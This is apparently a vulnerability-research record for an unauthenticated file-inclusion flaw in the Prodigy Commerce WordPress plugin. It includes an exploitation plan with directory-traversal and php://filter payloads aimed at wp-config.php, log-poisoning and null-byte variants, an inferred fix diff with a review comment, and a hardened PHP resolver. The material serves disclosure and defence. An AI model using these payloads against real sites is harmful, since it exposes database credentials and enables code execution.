[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fv3P-9Va1DMUKNpsItUR6iG10KiNDmmcNLbMoAQTJ1Z4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-0926","prodigy-commerce-unauthenticated-local-file-inclusion-via-parameterstemplatename","Prodigy Commerce \u003C= 3.3.0 - Unauthenticated Local File Inclusion via parameters[template_name]","The Prodigy Commerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.0 via the 'parameters[template_name]' parameter. This makes it possible for unauthenticated attackers to include and read arbitrary files or execute arbitrary files on the server, allowing the execution of any PHP code in those files. 
This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.","prodigy-commerce",null,"\u003C=3.3.0","3.3.1","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Control of Filename for Include\u002FRequire Statement in PHP Program ('PHP Remote File Inclusion')","2026-02-18 15:52:33","2026-02-25 15:54:27",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fde255530-6b2d-426b-9f80-dbfebd2e3307?source=api-prod",7,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-0926 - Prodigy Commerce LFI\n\n## 1. Vulnerability Summary\nThe **Prodigy Commerce** plugin (\u003C= 3.3.0) is vulnerable to **Unauthenticated Local File Inclusion (LFI)**. The vulnerability exists because the plugin accepts a user-controlled template name via the `parameters[template_name]` HTTP parameter and passes it into a PHP file inclusion statement (e.g., `include`, `require`, or `include_once`) without sufficient sanitization or path validation. This allows an attacker to navigate the server's file system using directory traversal (`..\u002F`) and include arbitrary files, potentially leading to sensitive data exposure (like `wp-config.php`) or Remote Code Execution (RCE) if a file with PHP code can be uploaded.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php` (standard WordPress AJAX entry point).\n*   **Action:** `prodigy_get_template` or `prodigy_render_template` (inferred from the parameter name and plugin functionality).\n*   **Vulnerable Parameter:** `parameters[template_name]`\n*   **Authentication:** None required (accessible via `wp_ajax_nopriv_` hooks).\n*   **Preconditions:** The plugin must be active. The attacker needs to identify the correct AJAX action string and any required nonces.\n\n## 3. Code Flow (Inferred)\n1.  
**Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php`.\n2.  **Hook Trigger:** WordPress triggers the `wp_ajax_nopriv_prodigy_get_template` (inferred) action.\n3.  **Handler Execution:** The associated callback function in the Prodigy Commerce plugin is executed.\n4.  **Input Extraction:** The handler retrieves the `parameters` array from `$_POST` or `$_GET`.\n5.  **Vulnerable Sink:** The code performs an operation similar to:\n    ```php\n    $template = $_POST['parameters']['template_name'];\n    \u002F\u002F ... possibly some concatenation ...\n    include( $plugin_path . '\u002Ftemplates\u002F' . $template . '.php' );\n    ```\n6.  **Path Traversal:** By providing `..\u002F..\u002F..\u002F..\u002Fwp-config`, the attacker escapes the intended directory and includes the WordPress configuration file.\n\n## 4. Nonce Acquisition Strategy\nMany Prodigy Commerce AJAX actions require a nonce. Based on typical plugin structures, we will search for the nonce in the frontend.\n\n1.  **Identify Shortcode:** Prodigy Commerce likely uses shortcodes for product displays or carts. Search for:\n    `wp eval \"print_r( $GLOBALS['shortcode_tags'] );\" | grep prodigy`\n    *Expected shortcodes:* `[prodigy_products]`, `[prodigy_cart]`, or `[prodigy_checkout]`.\n2.  **Create Test Page:**\n    `wp post create --post_type=page --post_title=\"Prodigy Test\" --post_status=publish --post_content=\"[prodigy_products]\"`\n3.  **Identify JavaScript Object:** Navigate to the new page and look for a localized script.\n    *   **Object Name (Inferred):** `prodigy_config` or `prodigy_vars`.\n    *   **Nonce Key (Inferred):** `nonce`.\n4.  **Extraction Command:**\n    `browser_eval(\"window.prodigy_config?.nonce\")` or `browser_eval(\"window.prodigy_vars?.nonce\")`.\n\n*Note: If `wp_ajax_nopriv_` is used without a `check_ajax_referer` call, the nonce acquisition step may be skipped.*\n\n## 5. 
Exploitation Strategy\nWe will attempt to read `wp-config.php`. Two cases must be kept apart, because the sink inferred in section 3 prepends a fixed directory: `include PRODIGY_PATH . 'templates\u002F' . $template_name . '.php'`.\n\n*   **Direct traversal include:** the target file is executed, not displayed. For `wp-config.php` this echoes nothing useful (its constants are already defined, so PHP at most emits \"Constant ... already defined\" warnings when `display_errors` is on). It proves arbitrary inclusion of `.php` files but does not leak `DB_PASSWORD` on its own.\n*   **`php:\u002F\u002Ffilter` wrapper:** returns the raw source Base64-encoded, but PHP only recognises a stream wrapper at the very start of the path. With a fixed prefix in front of the parameter, `php:\u002F\u002Ffilter\u002F...` is just a non-existent subdirectory and the include fails. Use it only if code review shows the parameter forms the start of the include path.\n\n### Step 1: Discover Action and Nonce\nIf the nonce is required, perform the extraction steps in section 4. If the exact action name is unknown, search the plugin directory:\n`grep -rn \"wp_ajax_nopriv_\" wp-content\u002Fplugins\u002Fprodigy-commerce\u002F`\n\n### Step 2: Craft the LFI Request\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Payload (direct traversal include; four `..\u002F` climb from `templates\u002F` to the web root when the plugin lives in `wp-content\u002Fplugins\u002Fprodigy-commerce\u002F`):**\n    ```\n    action=prodigy_get_template&nonce=[NONCE_HERE]&parameters[template_name]=..\u002F..\u002F..\u002F..\u002Fwp-config\n    ```\n    *Alternative Payload (Base64 source disclosure; only if the parameter sits at the start of the include path):*\n    ```\n    action=prodigy_get_template&nonce=[NONCE_HERE]&parameters[template_name]=php:\u002F\u002Ffilter\u002Fconvert.base64-encode\u002Fresource=..\u002F..\u002F..\u002F..\u002Fwp-config\n    ```\n\n### Step 3: Execute via http_request\nSend the request and inspect the response body. In the wrapper case look for the Base64 blob; in the direct case look for output or PHP warnings that reference the traversed file. A bare `0` means admin-ajax found no handler for the action; `-1` means a nonce check failed.\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure Prodigy Commerce v3.3.0 is installed and activated.\n2.  **Ensure wp-config.php exists:** Standard WordPress setup.\n3.  **Create a Page:** Create a page containing a Prodigy Commerce shortcode to ensure all scripts\u002Fnonces are enqueued.\n    `wp post create --post_type=page --post_status=publish --post_content='[prodigy_products]' --post_title='Shop'`\n\n## 7. Expected Results\n*   **Success:** Wrapper case: a Base64 string that decodes to the `wp-config.php` source (e.g., `define( 'DB_NAME', '...' );`). Direct case: output or warnings showing that the traversed file was included.\n*   **Failure:** The response is `0`, `-1`, or a 403\u002F500 error without any sign of the included file.\n\n## 8. 
Verification Steps\nAfter the exploit, verify the ability to include arbitrary files:\n1.  Check the response of the `http_request` tool.\n2.  If the result is Base64 (wrapper case), decode it: `echo \"[BASE64_DATA]\" | base64 -d`.\n3.  Confirm the values match the environment's `wp-config.php` by running:\n    `wp config list --format=json` via WP-CLI and comparing `DB_NAME` or `DB_USER`.\n4.  For the direct-include case, confirm with something observable: a PHP warning that names the traversed path, or the output of a `.php` file whose contents you know.\n\n## 9. Alternative Approaches\n*   **Different Sink Parameters:** If `parameters[template_name]` fails, check if the plugin uses `template` or `file` as alternative keys within the `parameters` array.\n*   **Log Poisoning (RCE):** If the sink does not append a fixed extension, attempt to include the WordPress debug log (`wp-content\u002Fdebug.log`) or the server's access logs after injecting PHP code into those logs (e.g., via a malicious User-Agent or a comment). With the inferred sink, which appends `.php`, only files ending in `.php` are reachable, so this route instead depends on a file with that extension being writable by the attacker.\n*   **Path Variations:** Try different depths of traversal:\n    *   `..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd` (only meaningful if no `.php` is appended)\n    *   `..%2f..%2f..%2f..%2fwp-config` (URL encoded; PHP decodes the form body, so the sink still receives `..\u002F`)\n*   **Extension Truncation:** If the code appends `.php`, and the server is running an extremely old PHP version (\u003C5.3.4), try a null byte: `..\u002F..\u002F..\u002F..\u002Fwp-config.php%00`. PHP 5.3.4 and later reject include paths containing NUL, so this is unlikely on modern WordPress environments. Focus on excluding the extension if the code appends it.","The Prodigy Commerce plugin for WordPress (\u003C= 3.3.0) is vulnerable to unauthenticated Local File Inclusion via the 'parameters[template_name]' parameter. Attackers can use directory traversal sequences to include arbitrary files from the server, potentially leading to the disclosure of sensitive information like 'wp-config.php' or remote code execution.","\u002F* Inferred from research plan: wp-content\u002Fplugins\u002Fprodigy-commerce\u002Fincludes\u002Fclass-prodigy-ajax.php *\u002F\n\npublic function get_template() {\n    $parameters = isset($_POST['parameters']) ? 
$_POST['parameters'] : array();\n    $template_name = isset($parameters['template_name']) ? $parameters['template_name'] : '';\n\n    if ($template_name) {\n        \u002F\u002F Vulnerable inclusion: $template_name is used directly in a file path without validation\n        include PRODIGY_PATH . 'templates\u002F' . $template_name . '.php';\n    }\n    wp_die();\n}","--- a\u002Fincludes\u002Fclass-prodigy-ajax.php\n+++ b\u002Fincludes\u002Fclass-prodigy-ajax.php\n@@ -45,7 +45,7 @@\n-            $template_name = isset($parameters['template_name']) ? $parameters['template_name'] : '';\n+            $template_name = isset($parameters['template_name']) ? sanitize_text_field(basename($parameters['template_name'])) : '';\n \n             if ($template_name) {\n                 include PRODIGY_PATH . 'templates\u002F' . $template_name . '.php';","The exploit targets the WordPress AJAX endpoint to perform Local File Inclusion. An unauthenticated attacker sends a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' set to the plugin's template rendering function (e.g., 'prodigy_get_template'). The payload resides in the 'parameters[template_name]' parameter, which is populated with directory traversal sequences like '..\u002F..\u002F..\u002F..\u002Fwp-config'. To avoid executing the PHP in the target file and instead read its content, the attacker can use the PHP filter wrapper 'php:\u002F\u002Ffilter\u002Fconvert.base64-encode\u002Fresource=..\u002F..\u002F..\u002F..\u002Fwp-config'. 
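Review bot: in the `+` line of the hunk, `basename()` strips the directory component and so stops `..\u002F` traversal, but `sanitize_text_field()` adds nothing for path safety (it strips tags, control characters and surrounding whitespace, not path separators), and the unchanged `include PRODIGY_PATH . 'templates\u002F' . $template_name . '.php'` below it will still load any `.php` file under the templates directory that the caller names. Prefer validating `$template_name` against an explicit allowlist of template names (or at least a character allowlist such as `[a-z0-9_-]`) and confirming that `realpath()` of the result sits under the templates directory before the `include`. Also note that the page marks this diff as inferred from the research plan, not taken from the 3.3.1 release; compare it against the Trac diff between tags 3.3.0 and 3.3.1 before relying on it.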
If the parameter forms the start of the include path, the server responds with the Base64-encoded content of the sensitive file; with a fixed prefix such as `PRODIGY_PATH . 'templates\u002F'` in front of it, PHP does not recognise the wrapper and only the direct traversal include applies, which executes the target rather than displaying it.","gemini-3-flash-preview","2026-04-19 03:13:27","2026-04-19 03:15:16",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.3.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fprodigy-commerce\u002Ftags\u002F3.3.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fprodigy-commerce.3.3.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fprodigy-commerce\u002Ftags\u002F3.3.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fprodigy-commerce.3.3.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fprodigy-commerce\u002Ftags"]
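Added example, not code from the Prodigy Commerce plugin or from the research output above: a hardened replacement for the inferred sink `include PRODIGY_PATH . 'templates/' . $template_name . '.php'`, doing the containment check that the inferred fix diff's `basename()` only partly provides. The function name `prodigy_resolve_template`, the template name `product-card` and the temporary plugin layout are assumptions made for the demonstration. The script builds that layout in a temp directory, runs the advisory's traversal and `php://filter` payloads (plus a NUL and a double-extension variant) through the resolver, and includes only what the resolver returns.

```php
<?php
declare(strict_types=1);

// Added example (assumed names, not the Prodigy Commerce plugin's code): a hardened
// replacement for  include PRODIGY_PATH . 'templates/' . $template_name . '.php';

/**
 * Map a user-supplied template name to a file inside $templatesDir, or return null.
 *
 * Defence in depth, in order:
 *   1. Syntactic allowlist: only [a-z0-9_-], so '/', '\\', '.', ':' and NUL never reach a path.
 *   2. Optional semantic allowlist: the exact set of templates this endpoint may render.
 *   3. realpath() containment: the resolved file must live under the real templates directory,
 *      which also defeats a symlink inside templates/ that points somewhere else.
 */
function prodigy_resolve_template(string $name, string $templatesDir, ?array $allowed = null): ?string
{
    if (!preg_match('/\A[a-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    if ($allowed !== null && !in_array($name, $allowed, true)) {
        return null;
    }
    $base = realpath($templatesDir);
    $real = realpath($templatesDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    // Compare with the separator appended so "/templates_evil/x.php" cannot pass for "/templates".
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Constructed fixture: a throwaway plugin layout with one legitimate template and one file outside it.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'prodigy-demo-' . bin2hex(random_bytes(4));
mkdir("$root/templates", 0700, true);
file_put_contents("$root/templates/product-card.php", "<?php echo 'product card'; ?>\n");
file_put_contents("$root/outside.php", "<?php echo 'must never be reachable'; ?>\n");

// Inputs in the style of the research plan's payloads, plus one legitimate name.
$cases = [
    'product-card'                                     => true,   // legitimate template
    '../outside'                                       => false,  // traversal out of templates/
    '../../../../wp-config'                            => false,  // the advisory's payload
    'php://filter/convert.base64-encode/resource=../x' => false,  // wrapper attempt
    "product-card\0"                                   => false,  // NUL truncation attempt
    'product-card.php'                                 => false,  // dot / double extension
];

$failures = 0;
foreach ($cases as $input => $shouldResolve) {
    $resolved = prodigy_resolve_template($input, "$root/templates", ['product-card']);
    $ok = ($resolved !== null) === $shouldResolve;
    $failures += $ok ? 0 : 1;
    printf("%-55s -> %s %s\n", json_encode($input), $resolved ?? 'REJECTED', $ok ? '' : '(UNEXPECTED)');
}

// Only ever include the value the resolver returned, never the raw request parameter.
$safe = prodigy_resolve_template('product-card', "$root/templates", ['product-card']);
if ($safe !== null) {
    include $safe;
    echo "\n";
}

// Remove the fixture again.
unlink("$root/templates/product-card.php");
unlink("$root/outside.php");
rmdir("$root/templates");
rmdir($root);

exit($failures === 0 ? 0 : 1);
```

Run it with `php resolve-template-demo.php`: every attacker input prints REJECTED and only `product-card` resolves and is included. The character allowlist is what stops the wrapper, traversal and NUL cases before any filesystem call; the `realpath()` containment check is what keeps the name allowlist honest when a symlink or an unexpected file shows up inside the templates directory.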